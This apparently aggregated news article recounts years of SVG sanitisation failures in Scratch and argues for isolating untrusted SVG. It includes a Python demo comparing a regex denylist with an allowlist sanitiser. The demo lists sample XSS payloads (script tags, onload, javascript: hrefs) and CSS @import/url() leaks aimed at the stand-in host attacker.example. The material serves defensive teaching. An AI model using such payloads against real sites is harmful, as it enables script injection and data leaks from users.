HeadlinesBriefing.com

Scratch SVG Sanitization Flaws Reveal Endless Cycle of Fixes and Exploits

Hacker News

Scratch has long struggled to secure user-generated SVG content, and the result has been a series of vulnerabilities exposing users to XSS and data leaks. The risky step has not changed: attacker-controlled SVG is parsed into the main document for operations such as bounding box measurement, so the browser interprets that markup in the same origin as the logged-in user. Years of incremental fixes have each closed one vector while leaving that step in place, and new exploits keep emerging from it, which points to a strategy that piles sanitization layers on top of an unsafe design rather than removing it.

The vulnerabilities began in 2019, when Scratch found that `<script>` tags in uploaded SVGs could execute. The fix was a regex, and in 2020 it was bypassed: the regex was case-sensitive, so differently cased tags slipped past it, and vectors it never addressed, such as inline event handlers, remained. In 2023, CSS `@import` statements inside SVG styles enabled HTTP leaks (requests to attacker-chosen hosts triggered merely by viewing the content), prompting integration of a CSS parser. In 2024, SVGs were passed to Paper.js without sanitization, reopening XSS, and in 2025 further flaws surfaced in how URLs inside CSS `url()` functions were handled. Each fix addressed only the vector just reported, and the next report found the gap beside it.

Scratch’s reliance on DOMPurify plus custom sanitization code shows how hard SVG is to secure at the markup layer. The 2020 bypass of the regex fix, for instance, exposed millions of users to account takeover, since script running in a logged-in user’s page can act as that user. The 2023 HTTP leak via CSS showed the limit of a markup-level sanitizer: DOMPurify filters elements and attributes, but it does not parse CSS, so a leak carried inside a `<style>` element it permits passes through untouched. The 2026 update added further layers to handle escaped URLs and CSS variables, yet the cycle continues.
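To make the contrast in the two paragraphs above concrete, here is an added example (not Scratch’s code, and not taken from the Hacker News thread) that runs the vector classes named in the timeline through two sanitizers: a case-sensitive regex denylist in the spirit of the 2019 fix, and an allowlist rebuild after parsing with an inert XML parser. Python is used because its standard library ships such a parser; Scratch’s own code is JavaScript, where the equivalent inert parse is `new DOMParser().parseFromString(svg, "image/svg+xml")` rather than assigning the markup to the live document. The payloads, the `attacker.example` hostname, the allowlists, and every function name are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# --- Approach 1: a regex denylist in the spirit of the 2019 fix (illustrative, not Scratch's code) ---
NAIVE_SCRIPT_RE = re.compile(r"<script>.*?</script>", re.DOTALL)

def naive_sanitize(svg: str) -> str:
    """Remove literal lowercase <script>...</script> blocks and nothing else."""
    return NAIVE_SCRIPT_RE.sub("", svg)

# --- Approach 2: parse with an inert XML parser and rebuild the tree from an allowlist ---
# The allowlists are deliberately small for this example; a real renderer needs more entries,
# but each addition is an explicit decision instead of a denial that was forgotten.
ALLOWED_ELEMENTS = {"svg", "g", "defs", "use", "path", "rect", "circle", "ellipse", "line",
                    "polyline", "polygon", "text", "tspan", "linearGradient", "radialGradient", "stop"}
ALLOWED_ATTRS = {"id", "d", "x", "y", "width", "height", "rx", "ry", "cx", "cy", "r", "x1", "y1",
                 "x2", "y2", "points", "fill", "stroke", "stroke-width", "transform", "viewBox",
                 "offset", "stop-color", "font-size", "href"}
# Only fragment references and raster data: URIs may be link targets. Everything else
# (javascript:, http:, data:image/svg+xml, whitespace- or entity-obfuscated schemes) is dropped.
SAFE_HREF_RE = re.compile(r"^(#|data:image/(?:png|jpeg|gif);base64,)", re.IGNORECASE)

def _local(name: str) -> str:
    """Strip ElementTree's '{namespace}' prefix so svg:script and xlink:href compare by local name."""
    return name.rsplit("}", 1)[-1]

def _clean(elem):
    """Rebuild elem from the allowlists; return None to drop it together with its subtree."""
    name = _local(elem.tag)
    if name not in ALLOWED_ELEMENTS:
        # Covers <script>, <SCRIPT>, <style>, <a>, <foreignObject>, <animate>, ... without naming them.
        return None
    new = ET.Element(name)
    for attr, value in elem.attrib.items():
        local = _local(attr)
        if local.startswith("on") or local == "style":
            continue  # event handlers; inline CSS is where url() and @import leaks live
        if local not in ALLOWED_ATTRS:
            continue
        # The parser has already decoded entities, so "&#106;avascript:" arrives here as "javascript:".
        if local == "href" and not SAFE_HREF_RE.match(value.strip()):
            continue
        new.set(local, value)
    if name in ("text", "tspan"):
        new.text = elem.text  # re-serialised with escaping; text between tspans is dropped here
    for child in elem:
        cleaned_child = _clean(child)
        if cleaned_child is not None:
            new.append(cleaned_child)
    return new

def sanitize(svg: str) -> str:
    """Return an allowlisted SVG string, or "" if the input is not a well-formed SVG document."""
    try:
        # Nothing executes here: no script, no style resolution, no fetch. A malformed document is
        # rejected instead of being "repaired" the way an HTML parser would. For production input,
        # defusedxml.ElementTree.fromstring has the same signature and also refuses entity-expansion attacks.
        root = ET.fromstring(svg)
    except ET.ParseError:
        return ""
    cleaned = _clean(root)
    if cleaned is None or cleaned.tag != "svg":
        return ""
    cleaned.set("xmlns", SVG_NS)
    return ET.tostring(cleaned, encoding="unicode")

# Constructed payloads, one per vector class the article names (hostname and code are made up).
# "uppercase script" matters when the markup is fed to an HTML parser, which lowercases tag names.
PAYLOADS = {
    "lowercase script":    f'<svg xmlns="{SVG_NS}"><script>alert(1)</script></svg>',
    "uppercase script":    f'<svg xmlns="{SVG_NS}"><SCRIPT>alert(1)</SCRIPT></svg>',
    "inline handler":      f'<svg xmlns="{SVG_NS}" onload="alert(1)"><rect width="1" height="1"/></svg>',
    "javascript xlink":    f'<svg xmlns="{SVG_NS}" xmlns:xlink="http://www.w3.org/1999/xlink">'
                           f'<a xlink:href="javascript:alert(1)"><rect width="1" height="1"/></a></svg>',
    "entity-encoded href": f'<svg xmlns="{SVG_NS}"><use href="&#106;avascript:alert(1)"/></svg>',
    "css @import leak":    f'<svg xmlns="{SVG_NS}"><style>@import url("http://attacker.example/leak");</style></svg>',
    "css url() leak":      f'<svg xmlns="{SVG_NS}"><rect style="fill:url(http://attacker.example/leak)"/></svg>',
    "escaped css url()":   f'<svg xmlns="{SVG_NS}"><style>rect{{fill:url(\\68ttp://attacker.example/leak)}}</style></svg>',
}
DANGEROUS_MARKERS = ("alert(1)", "attacker.example", "javascript:", "onload")

def surviving_vectors(sanitizer) -> list:
    """Names of payloads whose dangerous marker is still present after running sanitizer over them."""
    return [name for name, svg in PAYLOADS.items()
            if any(marker in sanitizer(svg) for marker in DANGEROUS_MARKERS)]

if __name__ == "__main__":
    print("naive regex lets through:", surviving_vectors(naive_sanitize))
    print("allowlist lets through:  ", surviving_vectors(sanitize))
```

The regex stops exactly one of the eight payloads; the allowlist stops all of them without ever mentioning `script`, `style`, `javascript:` or `@import`, because anything it does not recognise is discarded. That is the structural difference the article is pointing at: a denylist has to anticipate every encoding and every parser quirk, while an allowlist only has to describe what a drawing legitimately contains.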

Today, Scratch’s SVG handling remains a cautionary tale: however many sanitization layers are added, parsing untrusted markup into the live document stays risky, because the browser, not the sanitizer, has the final say on what that markup means. Until Scratch changes the architecture so that untrusted SVG never reaches the main document (rendering it through an `<img>` element, where scripts do not run and external resources are not fetched, or inside a sandboxed frame on a separate origin, where script has no access to the user’s session), the platform will not be safe. XSS and HTTP leaks will endure until a root-cause fix replaces the incremental patchwork.